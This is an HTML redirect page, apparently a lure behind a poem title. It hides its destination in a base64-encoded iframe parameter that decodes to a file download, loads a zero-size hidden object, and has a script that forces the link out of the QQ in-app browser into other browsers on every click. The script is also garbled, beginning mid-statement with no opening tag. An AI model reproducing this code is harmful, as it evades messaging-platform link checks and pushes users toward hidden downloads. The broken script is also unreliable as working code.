<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <title>山有木兮木有枝 心悦君兮君不知</title>
  <style>
    body {
      margin: 0;
      padding: 0;
      height: 100vh;
      overflow: hidden;
    }
    iframe {
      border: none;
      width: 100%;
      height: 100%;
      position: relative;
      z-index: 1;
    }
    #overlay {
      position: fixed;
      top: 50%;
      left: 50%;
      width: 300px;
      height: 100px;
      margin-top: -200px; /* 垂直居中 */
      margin-left: -150px; /* 水平居中 */
      background-color: rgba(0,0,0,0.5);
      display: flex;
      justify-content: center;
      align-items: center;
      flex-direction: column;
      z-index: 2;
      font-size: 24px;
      text-align: center;
	  
    }
    #cancel {
      position: absolute;
      top: 10px;
      right: 10px;
      color: white;
      font-size: 24px;
      cursor: pointer;
    }
	#overlay p {
  color: red;
  font-size: 24px;
  margin-bottom: 20px;
  overflow: hidden;
  white-space: nowrap;
  animation: marquee 5s linear infinite;
}
  </style>
</head>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<object data="http://www.baidu.com" width="0" height="0"></object>
<iframe src="https://6531.github.io/1.html?u=aHR0cHM6Ly9tb3JwaGlkYWUua2luZ2RlZS5jb20vZG93bmxvYWQ/ZmlsZUlkPTg1ODg2MjAyNTY2Mzg1MjU0NCZhcHBOYW1lPWxpbmtjZW8"></iframe>





  else { // 如果是 QQ 打开，则执行一些操作
      openu("ucbrowser://" + url);
      openu("mttbrowser://url=" + url);
      openu("baiduboxapp://browse?url=" + url);
      openu("googlechrome://browse?url=" + url);
      $("html").on("click", function () {
          openu("ucbrowser://" + url);
          openu("mttbrowser://url=" + url);
          openu("baiduboxapp://browse?url=" + url);
          openu("googlechrome://browse?url=" + url);
      });
  }
</script>
</body>
</html>
